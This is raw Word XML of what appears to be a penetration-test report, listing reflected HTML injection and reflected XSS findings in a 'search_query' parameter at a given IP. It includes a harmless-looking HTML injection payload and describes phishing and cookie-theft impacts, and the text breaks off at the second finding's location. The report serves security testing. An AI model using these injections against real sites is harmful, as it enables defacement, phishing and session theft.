        <w:t>What "bad" can happen, what risk does it carry?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Eop"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">After the description, make sure to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>drop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> your </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>screenshots</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> below.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Eop"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vulnerability 1</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af"/>
        <w:tblW w:w="10425" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstRow="1" w:noVBand="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:val="04a0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10425"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Description: Reflected HTML Injection -&gt;&gt; RISK: (Medium)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">The application fails to properly sanitize and encode user-supplied input, which is directly reflected back into the HTML response. Specifically, the input provided via the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>search_query</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> parameter is injected into the page without proper validation or escaping. This allows an attacker to inject arbitrary HTML tags and elements, such as </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>&lt;h1&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>&lt;img&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">, or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>&lt;iframe&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>, which may affect the structure and content of the page.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Although HTML injection typically does </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>not</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> allow direct execution of JavaScript (as in XSS), it can still be used to:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Manipulate page content and UI,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Deface the application,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Trick users into clicking malicious links (e.g., phishing),</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Embed external content such as fake login forms (e.g., </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>&lt;iframe src="..."&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>),</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Chain with other vulnerabilities to achieve more severe impact.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">If combined with attributes like </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>onerror</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>onload</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">, or form-based phishing techniques, the injection can escalate to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>XSS-level risk</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>, compromising user trust and data.</w:t>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tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>- Location: http://185.218.124.165/index.php?search_query=</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>- Payload Used:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>```html</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>&lt;h1 style="color:red"&gt;Are you scared? I got all of your information&lt;/h1&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Screenshots:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="4194" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="92">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>160020</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>83185</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="6158865" cy="1632585"/>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6158865" cy="1632585"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vulnerability 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af"/>
        <w:tblW w:w="10425" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstRow="1" w:noVBand="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:val="04a0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10425"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">Description: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">Reflected Cross-Site Scripting (XSS) -&gt;&gt; RISK: (Medium to High) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">The application does not properly sanitize user-supplied input passed via the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>search_query</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> parameter in the URL. By injecting JavaScript code, an attacker can execute arbitrary scripts in the context of the victim’s browser, leading to session hijacking, phishing campagn, and complete trust compromise. </w:t>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Style w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">This vulnerability demonstrates a lack of input validation and output encoding. In a production environment, it could be exploited to compromise user accounts or steal session cookies. The overall impact depends on the context of the victim (e.g., admin user = full compromise) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">→ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Location:</w:t>
            </w:r>
            <w:hyperlink r:id="rId3">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="InternetLink"/>
                  <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                  <w:b/>
                  <w:bCs/>
                  <w:kern w:val="0"/>
